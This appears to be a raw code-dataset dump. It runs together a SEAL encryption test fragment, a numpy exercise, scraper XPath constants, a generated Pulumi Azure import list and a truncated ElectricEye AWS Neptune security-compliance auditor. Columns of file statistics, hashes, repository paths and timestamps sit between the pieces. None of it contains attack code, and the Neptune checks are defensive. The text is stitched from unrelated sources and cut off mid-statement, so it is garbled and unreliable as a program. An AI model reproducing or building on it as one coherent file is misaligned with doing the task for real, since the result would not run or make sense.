def _test_encryptor_pk_setup(encryptor):
ciphertext = sealapi.Ciphertext(ctx)
plaintext = sealapi.Plaintext()
batchenc.encode(batch, plaintext)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert batchenc.decode_int64(plaintext_out)[: len(batch)] == batch
plaintext_out.set_zero()
encryptor = sealapi.Encryptor(ctx, public_key)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
_test_encryptor_pk_setup(encryptor)
def test_decryptor():
poly_modulus_degree = 4096
plain_modulus = 1024
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
intenc = sealapi.IntegerEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
expected_value = 1234
plaintext = intenc.encode(expected_value)
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
assert decryptor.invariant_noise_budget(ciphertext) > 0
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
| 33.806061
| 74
| 0.721943
| 634
| 5,578
| 6.047319
| 0.126183
| 0.093897
| 0.09181
| 0.062598
| 0.862024
| 0.841419
| 0.841419
| 0.81951
| 0.761868
| 0.723005
| 0
| 0.014232
| 0.193797
| 5,578
| 164
| 75
| 34.012195
| 0.838337
| 0.010039
| 0
| 0.764228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbf4d428363502369e2f5134e48d4cae1978aa5b
| 265
|
py
|
Python
|
HackerRank/Python/np-array-mathematics.py
|
object-oriented-human/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | 2
|
2021-07-27T10:46:47.000Z
|
2021-07-27T10:47:57.000Z
|
HackerRank/Python/np-array-mathematics.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
HackerRank/Python/np-array-mathematics.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
import numpy
n, m = map(int, input().split())
a = numpy.array([list(map(int, input().split())) for i in range(n)])
b = numpy.array([list(map(int, input().split())) for i in range(n)])
print(a + b)
print(a - b)
print(a * b)
print(a // b)
print(a % b)
print(a ** b)
| 22.083333
| 68
| 0.592453
| 52
| 265
| 3.019231
| 0.326923
| 0.229299
| 0.267516
| 0.382166
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0
| 0
| 0.158491
| 265
| 12
| 69
| 22.083333
| 0.704036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.6
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
fbf95296042be9e8e7f44da802b289d5374b5a27
| 1,070
|
py
|
Python
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 16
|
2020-11-17T04:26:30.000Z
|
2022-01-12T03:31:30.000Z
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 2
|
2021-03-05T08:42:35.000Z
|
2021-11-05T09:02:01.000Z
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 4
|
2020-11-17T06:32:53.000Z
|
2022-01-04T02:45:22.000Z
|
#!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
# 此代码仅供学习与交流,请勿用于商业用途。
# 页面元素的XPATH
from lib.spider.base_spider import SPIDER_NAME, LIANJIA_SPIDER, BEIKE_SPIDER
if SPIDER_NAME == LIANJIA_SPIDER:
ERSHOUFANG_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
ERSHOUFANG_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
XIAOQU_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
XIAOQU_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
DISTRICT_AREA_XPATH = '//div[3]/div[1]/dl[2]/dd/div/div[2]/a'
CITY_DISTRICT_XPATH = '///div[3]/div[1]/dl[2]/dd/div/div/a'
elif SPIDER_NAME == BEIKE_SPIDER:
ERSHOUFANG_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
ERSHOUFANG_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
XIAOQU_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
XIAOQU_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
DISTRICT_AREA_XPATH = '//div[3]/div[1]/dl[2]/dd/div/div[2]/a'
CITY_DISTRICT_XPATH = '///div[3]/div[1]/dl[2]/dd/div/div/a'
| 46.521739
| 76
| 0.65514
| 180
| 1,070
| 3.716667
| 0.222222
| 0.089686
| 0.155456
| 0.239163
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0
| 0.028154
| 0.103738
| 1,070
| 22
| 77
| 48.636364
| 0.669447
| 0.079439
| 0
| 0.8
| 0
| 0.133333
| 0.485714
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2200605a0fdc4662269c5ba2285af92aae14bd79
| 67
|
py
|
Python
|
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
# temperature_converter_py
from .temperature_converter_py import *
| 22.333333
| 39
| 0.865672
| 8
| 67
| 6.75
| 0.625
| 0.740741
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089552
| 67
| 2
| 40
| 33.5
| 0.885246
| 0.358209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
220742b0a7512878f074947b8c5120a0a800d975
| 3,870
|
py
|
Python
|
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .account import *
from .adls_gen1_file_data_set import *
from .adls_gen1_folder_data_set import *
from .adls_gen2_file_data_set import *
from .adls_gen2_file_data_set_mapping import *
from .adls_gen2_file_system_data_set import *
from .adls_gen2_file_system_data_set_mapping import *
from .adls_gen2_folder_data_set import *
from .adls_gen2_folder_data_set_mapping import *
from .adls_gen2_storage_account_data_set import *
from .adls_gen2_storage_account_data_set_mapping import *
from .blob_container_data_set import *
from .blob_container_data_set_mapping import *
from .blob_data_set import *
from .blob_data_set_mapping import *
from .blob_folder_data_set import *
from .blob_folder_data_set_mapping import *
from .blob_storage_account_data_set import *
from .blob_storage_account_data_set_mapping import *
from .data_set import *
from .data_set_mapping import *
from .get_account import *
from .get_adls_gen1_file_data_set import *
from .get_adls_gen1_folder_data_set import *
from .get_adls_gen2_file_data_set import *
from .get_adls_gen2_file_data_set_mapping import *
from .get_adls_gen2_file_system_data_set import *
from .get_adls_gen2_file_system_data_set_mapping import *
from .get_adls_gen2_folder_data_set import *
from .get_adls_gen2_folder_data_set_mapping import *
from .get_adls_gen2_storage_account_data_set import *
from .get_adls_gen2_storage_account_data_set_mapping import *
from .get_blob_container_data_set import *
from .get_blob_container_data_set_mapping import *
from .get_blob_data_set import *
from .get_blob_data_set_mapping import *
from .get_blob_folder_data_set import *
from .get_blob_folder_data_set_mapping import *
from .get_blob_storage_account_data_set import *
from .get_blob_storage_account_data_set_mapping import *
from .get_data_set import *
from .get_data_set_mapping import *
from .get_invitation import *
from .get_kusto_cluster_data_set import *
from .get_kusto_cluster_data_set_mapping import *
from .get_kusto_database_data_set import *
from .get_kusto_database_data_set_mapping import *
from .get_scheduled_synchronization_setting import *
from .get_scheduled_trigger import *
from .get_share import *
from .get_share_subscription import *
from .get_sql_db_table_data_set import *
from .get_sql_db_table_data_set_mapping import *
from .get_sql_dw_table_data_set import *
from .get_sql_dw_table_data_set_mapping import *
from .get_synapse_workspace_sql_pool_table_data_set import *
from .get_synapse_workspace_sql_pool_table_data_set_mapping import *
from .get_synchronization_setting import *
from .get_trigger import *
from .invitation import *
from .kusto_cluster_data_set import *
from .kusto_cluster_data_set_mapping import *
from .kusto_database_data_set import *
from .kusto_database_data_set_mapping import *
from .list_share_subscription_source_share_synchronization_settings import *
from .list_share_subscription_synchronization_details import *
from .list_share_subscription_synchronizations import *
from .list_share_synchronization_details import *
from .list_share_synchronizations import *
from .scheduled_synchronization_setting import *
from .scheduled_trigger import *
from .share import *
from .share_subscription import *
from .sql_db_table_data_set import *
from .sql_db_table_data_set_mapping import *
from .sql_dw_table_data_set import *
from .sql_dw_table_data_set_mapping import *
from .synapse_workspace_sql_pool_table_data_set import *
from .synapse_workspace_sql_pool_table_data_set_mapping import *
from .synchronization_setting import *
from .trigger import *
from ._inputs import *
from . import outputs
| 42.065217
| 80
| 0.851163
| 606
| 3,870
| 4.912541
| 0.120462
| 0.278804
| 0.165939
| 0.182734
| 0.80786
| 0.729258
| 0.621431
| 0.3957
| 0.21431
| 0.079274
| 0
| 0.006021
| 0.098708
| 3,870
| 91
| 81
| 42.527473
| 0.847477
| 0.052455
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
22103c770b336debc43ed2ffe02a68038481d2ba
| 34,545
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
neptune = boto3.client("neptune")
# loop through neptune instances
def describe_db_instances(cache):
response = cache.get("describe_db_instances")
if response:
return response
cache["describe_db_instances"] = neptune.describe_db_instances(
Filters=[{"Name": "engine", "Values": ["neptune"]}]
)
return cache["describe_db_instances"]
@registry.register_check("neptune")
def neptune_instance_multi_az_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.1] Neptune database instances should be configured to be highly available"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
mutliAzCheck = str(instances["MultiAZ"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if mutliAzCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-ha-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[Neptune.1] Neptune database instances should be configured to be highly available",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not have Multi-AZ enabled and thus is not highly available. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune High Availability and how to configure it refer to the High Availability for Neptune section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/feature-overview-availability.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-ha-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.1] Neptune database instances should be configured to be highly available",
"Description": "Neptune database instance "
+ neptuneDbId
+ " is highly available.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune High Availability and how to configure it refer to the High Availability for Neptune section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/feature-overview-availability.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_instance_storage_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.2] Neptune database instace storage should be encrypted"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
storageEncryptionCheck = str(instances["StorageEncrypted"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if storageEncryptionCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-storage-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Neptune.2] Neptune database instace storage should be encrypted",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not have storage encryption enabled. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune storage encryption and how to configure it refer to the Enabling Encryption for a Neptune DB Instance section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/encrypt.html#encrypt-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-storage-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.2] Neptune database instace storage should be encrypted",
"Description": "Neptune database instance "
+ neptuneDbId
+ " has storage encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune storage encryption and how to configure it refer to the Enabling Encryption for a Neptune DB Instance section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/encrypt.html#encrypt-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_instance_iam_authentication_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.3] Neptune database instaces storage should use IAM Database Authentication"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
iamDbAuthCheck = str(instances["IAMDatabaseAuthenticationEnabled"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if iamDbAuthCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-iam-db-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.3] Neptune database instaces storage should use IAM Database Authentication",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not use IAM Database Authentication. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune IAM Database Authentication and how to configure it refer to the Neptune Database Authentication Using IAM section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-iam-db-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.3] Neptune database instaces storage should use IAM Database Authentication",
"Description": "Neptune database instance "
+ neptuneDbId
+ " uses IAM Database Authentication.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune IAM Database Authentication and how to configure it refer to the Neptune Database Authentication Using IAM section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_cluster_parameter_ssl_enforcement_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases"""
response = neptune.describe_db_cluster_parameter_groups()
for parametergroup in response["DBClusterParameterGroups"]:
parameterGroupName = str(parametergroup["DBClusterParameterGroupName"])
parameterGroupArn = str(parametergroup["DBClusterParameterGroupArn"])
response = neptune.describe_db_cluster_parameters(
DBClusterParameterGroupName=parameterGroupName
)
for parameters in response["Parameters"]:
if str(parameters["ParameterName"]) == "neptune_enforce_ssl":
sslEnforcementCheck = str(parameters["ParameterValue"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if sslEnforcementCheck == "0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-ssl-enforcement-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " does not enforce SSL connections. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on enforcing SSL/HTTPS connections to Neptune instances refer to the Encryption in Transit: Connecting to Neptune Using SSL/HTTPS section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/security-ssl.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-ssl-enforcement-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
